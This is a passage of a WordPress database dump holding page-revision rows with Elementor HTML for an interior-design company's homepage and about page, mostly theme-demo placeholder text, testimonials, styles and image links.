1','','inherit','closed','closed','','22-revision-v1','','','2022-11-25 07:40:13','2022-11-25 07:40:13','',22,'https://bauhaus.futuremediatrix.com/?p=4737',0,'revision','',0),(4738,1,'2022-11-25 07:40:13','2022-11-25 07:40:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT INTERIOR</h3>\n														<h2>\n								We provide the best\narchitect & interior\ndesign services							</h2>\n		Our signature design process comes standard…refresh, remodel, new and enjoyable design experienceDuis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More Detail\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2022-11-25 07:40:13','2022-11-25 07:40:13','',22,'https://bauhaus.futuremediatrix.com/?p=4738',0,'revision','',0),(4739,1,'2022-11-25 07:40:14','2022-11-25 07:40:14','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2022-11-25 07:40:14','2022-11-25 07:40:14','',22,'https://bauhaus.futuremediatrix.com/?p=4739',0,'revision','',0),(4741,1,'2022-11-25 07:42:43','2022-11-25 07:42:43','<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n							<h3>Get to know us</h3>\n														<h2>\n								Most experienced architects & designers							</h2>\n		There are certain attributes of a profession and one has to catch hold of them in order to work efficiently and grow in that business. I share my experience as an interior designer, a profession of great esthetic value and charm.		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>Mike Hardson</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			